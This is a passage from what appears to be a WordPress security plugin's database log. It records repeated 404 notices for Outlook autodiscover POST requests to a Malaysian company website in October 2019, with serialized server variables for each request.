charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{8B8D875B-9EFE-4EAC-9D7A-D60B2818C344}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wboxV0SvqUWaw3AGHzAAAAUk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wboxV0SvqUWaw3AGHzAAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582638.1845\";s:12:\"REQUEST_TIME\";s:10:\"1570582638\";}}','notice','2019-10-09 00:57:20','2019-10-09 00:57:18',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27753,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{3AF88D22-DCEA-4195-B7CB-E97B99BC36E5}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0waoxV0SvqUWaw3AGHyAAAAUs\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0waoxV0SvqUWaw3AGHyAAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570582634.593\";s:12:\"REQUEST_TIME\";s:10:\"1570582634\";}}','notice','2019-10-09 00:57:16','2019-10-09 00:57:15',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27752,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{C8364CB2-D31A-46BE-8A25-A0F2B387214D}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wZ4xV0SvqUWaw3AGHxgAAAUE\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wZ4xV0SvqUWaw3AGHxgAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582631.6886\";s:12:\"REQUEST_TIME\";s:10:\"1570582631\";}}','notice','2019-10-09 00:57:13','2019-10-09 00:57:12',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27751,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{0F15E004-87A8-417C-8F47-48457C3380A5}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wZYxV0SvqUWaw3AGHmwAAAUg\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wZYxV0SvqUWaw3AGHmwAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582629.1535\";s:12:\"REQUEST_TIME\";s:10:\"1570582629\";}}','notice','2019-10-09 00:57:10','2019-10-09 00:57:09',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27750,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{83D07F6A-246E-4FFD-9E5A-7B648A72FDC2}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wYYxV0SvqUWaw3AGHmQAAAUY\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wYYxV0SvqUWaw3AGHmQAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582625.8761\";s:12:\"REQUEST_TIME\";s:10:\"1570582625\";}}','notice','2019-10-09 00:57:07','2019-10-09 00:57:06',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27749,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{DEB9676D-4CC4-46F8-985B-6A2D7A77AFD6}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wXYxV0SvqUWaw3AGHlQAAAUM\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wXYxV0SvqUWaw3AGHlQAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570582621.365\";s:12:\"REQUEST_TIME\";s:10:\"1570582621\";}}','notice','2019-10-09 00:57:04','2019-10-09 00:57:01',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27748,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{63B921F8-BE49-46FE-B7CA-7FD09F08FC68}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wWoxV0SvqUWaw3AGHlAAAAUc\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wWoxV0SvqUWaw3AGHlAAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582618.3244\";s:12:\"REQUEST_TIME\";s:10:\"1570582618\";}}','notice','2019-10-09 00:57:00','2019-10-09 00:56:58',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27747,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{D382CA1B-7580-4EC0-9776-34ADEFC4A08A}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=12bc65eb0a8866957572a5730ae36569\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; 